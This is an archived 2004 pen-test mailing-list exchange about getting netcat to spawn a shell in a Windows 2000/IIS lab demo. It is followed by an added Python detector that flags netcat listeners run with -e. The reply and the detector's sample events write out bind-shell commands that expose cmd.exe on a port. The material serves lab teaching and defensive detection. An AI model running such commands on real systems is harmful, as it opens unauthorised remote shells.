RE: Hacking Demo and Test Lab

From: Grissett, Chris CONT Ciber (Chris.Grissett.Ciber_at_usarc-emh2.army.mil)
Date: 06/11/04

  • Next message: Victor Chapela: "RE: Hacking Demo and Test Lab"
    To: raza sharif <raza@raza.demon.co.uk>, pen-test@securityfocus.com
    Date: Fri, 11 Jun 2004 10:49:30 -0400
    
    

    Try this command on the remote machine
    nc -l -p 23 -t -e cmd.exe

    This allows nc to listen on port 23 for connections. When a connection is
    made it will spawn a cmd[dos] shell, or whatever program you want to exec.
    Hope that helps. If that fails, you can really impress the execs by using
    knoppix-std (http://knoppix-std.org), to do all your hacking demos. Or if
    you'd like, you could give me access to your lab, and I'd do it for you. I'm
    kidding, of course I couldn't do that, plus it would violate numerous laws
    and ethics :) Are you familiar with Linux?

    Christopher Grissett
    Security Analyst
    Network Enterprise Security Team

    -----Original Message-----
    From: raza sharif [mailto:raza@raza.demon.co.uk]
    Sent: Friday, June 11, 2004 7:42 AM
    To: pen-test@securityfocus.com
    Subject: Hacking Demo and Test Lab

    Hi Folks,

    I'm doing some advanced Hacking Demos for management and also Corporates etc.

    I have installed Windows 2000 Server and IIS 5.0 on VMware GSX Server.

    I'm using WebDAV and other exploits that all basically should spawn a shell
    using netcat.

    I'm using XP as my attacking machine.

    Prob at the moment is Netcat will not spawn a shell regardless of what I
    try.

    Any ideas? I checked the install; it is Windows 2000 500.1295, no reference
    to service packs etc. It's a default install.

    Also, what are good demos etc. to run to show real hacking on Windows 2000,
    IIS etc. that I can get to work?

    thanks

    Raza

    Raza@raza.demon.co.uk
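
A defender's view of the command in the reply above, as an added example that is not part of the original thread: a Python check that flags process command lines where netcat runs as a listener with `-e`, which is the pattern that binds a shell to a port. The binary-name list, function names and sample events are constructed assumptions.

```python
import shlex

# Netcat binary names to match (assumption; extend for your environment).
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}

def parse_netcat(cmdline):
    """Return {'listen', 'port', 'exec'} for a netcat command line, else None."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:                              # unbalanced quotes
        tokens = cmdline.split()
    if not tokens:
        return None
    exe = tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in NETCAT_NAMES:
        return None
    info = {"listen": False, "port": None, "exec": None}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and not tok.startswith("--"):
            flags = tok[1:]
            for pos, ch in enumerate(flags):        # handles clusters like -lvp
                if ch in "lL":
                    info["listen"] = True
                elif ch in "pe":                    # options that take a value
                    value = flags[pos + 1:]
                    if not value and i + 1 < len(tokens):
                        i += 1
                        value = tokens[i]
                    value = value.strip('"')
                    if ch == "p":
                        info["port"] = int(value) if value.isdigit() else value
                    else:
                        info["exec"] = value
                    break
        i += 1
    return info

def find_bind_shells(events):
    """events: iterable of (host, cmdline). Returns [(host, port, program)]."""
    hits = []
    for host, cmdline in events:
        info = parse_netcat(cmdline)
        if info and info["listen"] and info["exec"]:
            hits.append((host, info["port"], info["exec"]))
    return hits

# Constructed sample process-creation events (not real log data).
SAMPLE = [("host-a", r'nc -l -p 23 -t -e cmd.exe'),
          ("host-b", r'"C:\Tools\nc.exe" -lvp 4444 -e cmd.exe'),
          ("host-c", r'nc -l -p 8080'), ("host-d", r'nc -v 10.0.0.5 80')]
```

A listener without `-e` (host-c) and an outbound client connection (host-d) are parsed but not reported.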

